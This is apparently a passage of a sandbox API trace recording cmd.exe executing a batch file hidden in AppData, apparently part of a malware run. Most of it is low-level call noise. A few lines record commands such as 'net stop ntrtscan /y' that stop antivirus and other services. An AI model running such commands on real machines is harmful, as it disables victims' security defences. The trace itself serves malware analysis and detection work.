(_String1="net", _String2="RMDIR") returned -4 [0208.180] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0208.180] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0208.180] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0208.180] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0208.180] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0208.180] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0208.180] _wcsicmp (_String1="net", _String2="VER") returned -8 [0208.180] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0208.180] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0208.180] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0208.180] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0208.180] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0208.180] _wcsicmp (_String1="net", _String2="START") returned -5 [0208.180] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0208.180] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0208.180] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0208.181] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0208.181] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0208.181] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0208.181] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0208.181] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0208.181] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0208.181] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0208.181] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0208.181] SetErrorMode (uMode=0x0) returned 0x1 [0208.181] GetProcessHeap () returned 0x3e0000 [0208.181] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0208.181] GetProcessHeap () returned 0x3e0000 [0208.181] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0208.182] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0208.182] GetProcessHeap () returned 0x3e0000 [0208.182] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0208.182] GetProcessHeap () returned 0x3e0000 [0208.182] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0208.182] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0208.182] GetProcessHeap () returned 0x3e0000 [0208.182] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0208.182] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.182] GetProcessHeap () returned 0x3e0000 [0208.182] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0208.182] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0208.183] GetProcessHeap () returned 0x3e0000 [0208.183] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0208.183] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.183] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.183] GetLastError () returned 0x2 [0208.184] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.184] GetLastError () returned 0x2 [0208.184] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.185] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0208.185] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0208.185] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.185] GetLastError () returned 0x2 [0208.186] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0208.186] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0208.186] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.187] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0208.187] SetErrorMode (uMode=0x0) returned 0x1 [0208.187] GetProcessHeap () returned 0x3e0000 [0208.187] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0208.187] GetProcessHeap () returned 0x3e0000 [0208.187] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0208.187] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0208.187] GetProcessHeap () returned 0x3e0000 [0208.187] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0208.187] GetProcessHeap () returned 0x3e0000 [0208.187] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0208.188] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0208.188] GetProcessHeap () returned 0x3e0000 [0208.188] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0208.188] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.188] GetProcessHeap () returned 0x3e0000 [0208.188] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0208.188] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0208.188] GetProcessHeap () returned 0x3e0000 [0208.188] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0208.189] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.189] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.189] GetLastError () returned 0x2 [0208.189] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.190] GetLastError () returned 0x2 [0208.190] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.190] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0208.190] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0208.191] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.191] GetLastError () returned 0x2 [0208.191] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0208.191] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0208.192] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.192] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0208.192] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0208.192] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0208.192] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0208.192] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop svcGenericHost /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop svcGenericHost /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop svcGenericHost /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x924, dwThreadId=0x960)) returned 1 [0208.196] CloseHandle (hObject=0x78) returned 1 [0208.196] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0208.196] GetProcessHeap () returned 0x3e0000 [0208.196] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0208.196] GetEnvironmentStringsW () returned 0x3f8408* [0208.196] GetProcessHeap () returned 0x3e0000 [0208.196] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0208.197] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0208.197] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0208.341] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0208.341] CloseHandle (hObject=0x74) returned 1 [0208.341] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0208.341] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0208.341] GetProcessHeap () returned 0x3e0000 [0208.341] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0208.341] GetEnvironmentStringsW () returned 0x3f8408* [0208.341] GetProcessHeap () returned 0x3e0000 [0208.341] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0208.342] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0208.342] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0208.342] GetProcessHeap () returned 0x3e0000 [0208.342] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0208.342] GetEnvironmentStringsW () returned 0x3f8408* [0208.342] GetProcessHeap () returned 0x3e0000 [0208.342] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0208.342] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0208.342] GetProcessHeap () returned 0x3e0000 [0208.342] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0208.342] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0208.342] _get_osfhandle (_FileHandle=1) returned 0x264 [0208.342] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0208.342] _get_osfhandle (_FileHandle=1) returned 0x264 [0208.342] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0208.342] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0208.342] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0208.343] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0208.343] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0208.343] SetConsoleInputExeNameW () returned 0x1 [0208.343] GetConsoleOutputCP () returned 0x1b5 [0208.343] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0208.343] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.343] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0208.344] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0208.344] _get_osfhandle (_FileHandle=3) returned 0x74 [0208.344] SetFilePointer (in: hFile=0x74, lDistanceToMove=4436, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1154 [0208.344] GetProcessHeap () returned 0x3e0000 [0208.344] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0208.344] GetProcessHeap () returned 0x3e0000 [0208.344] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0208.344] GetProcessHeap () returned 0x3e0000 [0208.344] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0208.344] GetProcessHeap () returned 0x3e0000 [0208.344] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0208.344] GetProcessHeap () returned 0x3e0000 [0208.344] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0208.344] GetProcessHeap () returned 0x3e0000 [0208.344] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0208.344] GetProcessHeap () returned 0x3e0000 [0208.344] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0208.344] GetProcessHeap () returned 0x3e0000 [0208.344] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0208.344] GetProcessHeap () returned 0x3e0000 [0208.344] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0208.344] GetProcessHeap () returned 0x3e0000 [0208.344] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0208.344] GetProcessHeap () returned 0x3e0000 [0208.344] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0208.344] GetProcessHeap () returned 0x3e0000 [0208.344] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0208.344] GetProcessHeap () returned 0x3e0000 [0208.344] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0208.344] _get_osfhandle (_FileHandle=3) returned 0x74 [0208.344] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1154 [0208.344] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x76d, lpOverlapped=0x0) returned 1 [0208.345] SetFilePointer (in: hFile=0x74, lDistanceToMove=4458, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x116a [0208.345] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=22, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ntrtscan /y\r\nt /y\r\n ServiceΓÇ¥ /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 22 [0208.345] _get_osfhandle (_FileHandle=3) returned 0x74 [0208.345] GetFileType (hFile=0x74) returned 0x1 [0208.345] _get_osfhandle (_FileHandle=3) returned 0x74 [0208.345] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x116a [0208.345] GetProcessHeap () returned 0x3e0000 [0208.345] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0208.345] GetProcessHeap () returned 0x3e0000 [0208.345] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0208.348] _tell (_FileHandle=3) returned 4458 [0208.348] _close (_FileHandle=3) returned 0 [0208.348] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0208.349] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0208.349] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0208.349] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0208.349] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0208.349] _wcsicmp (_String1="net", _String2="CD") returned 11 [0208.349] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0208.349] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0208.349] _wcsicmp (_String1="net", _String2="REN") returned -4 [0208.349] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0208.349] _wcsicmp (_String1="net", _String2="SET") returned -5 [0208.349] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0208.349] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0208.349] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0208.349] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0208.349] _wcsicmp (_String1="net", _String2="MD") returned 1 [0208.349] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0208.349] _wcsicmp (_String1="net", _String2="RD") returned -4 [0208.349] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0208.349] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0208.349] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0208.349] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0208.349] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0208.349] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0208.349] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0208.349] _wcsicmp (_String1="net", _String2="VER") returned -8 [0208.349] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0208.349] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0208.349] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0208.349] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0208.349] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0208.349] _wcsicmp (_String1="net", _String2="START") returned -5 [0208.349] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0208.349] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0208.349] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0208.349] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0208.349] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0208.349] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0208.349] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0208.350] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0208.350] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0208.350] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0208.350] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0208.350] SetErrorMode (uMode=0x0) returned 0x1 [0208.350] GetProcessHeap () returned 0x3e0000 [0208.350] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0208.350] GetProcessHeap () returned 0x3e0000 [0208.350] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0208.350] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0208.350] GetProcessHeap () returned 0x3e0000 [0208.351] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0208.351] GetProcessHeap () returned 0x3e0000 [0208.351] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0208.351] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0208.351] GetProcessHeap () returned 0x3e0000 [0208.351] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0208.351] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.351] GetProcessHeap () returned 0x3e0000 [0208.351] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0208.351] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0208.351] GetProcessHeap () returned 0x3e0000 [0208.351] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0208.352] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.352] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.352] GetLastError () returned 0x2 [0208.353] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.353] GetLastError () returned 0x2 [0208.353] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.354] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0208.354] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0208.354] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.354] GetLastError () returned 0x2 [0208.355] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0208.355] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0208.355] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.355] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0208.356] SetErrorMode (uMode=0x0) returned 0x1 [0208.356] GetProcessHeap () returned 0x3e0000 [0208.356] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0208.356] GetProcessHeap () returned 0x3e0000 [0208.356] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0208.356] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0208.356] GetProcessHeap () returned 0x3e0000 [0208.356] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0208.356] GetProcessHeap () returned 0x3e0000 [0208.356] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0208.357] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0208.357] GetProcessHeap () returned 0x3e0000 [0208.357] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0208.357] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.357] GetProcessHeap () returned 0x3e0000 [0208.357] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0208.357] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0208.357] GetProcessHeap () returned 0x3e0000 [0208.357] RtlSizeHeap (HeapHandle=0x3e0000, 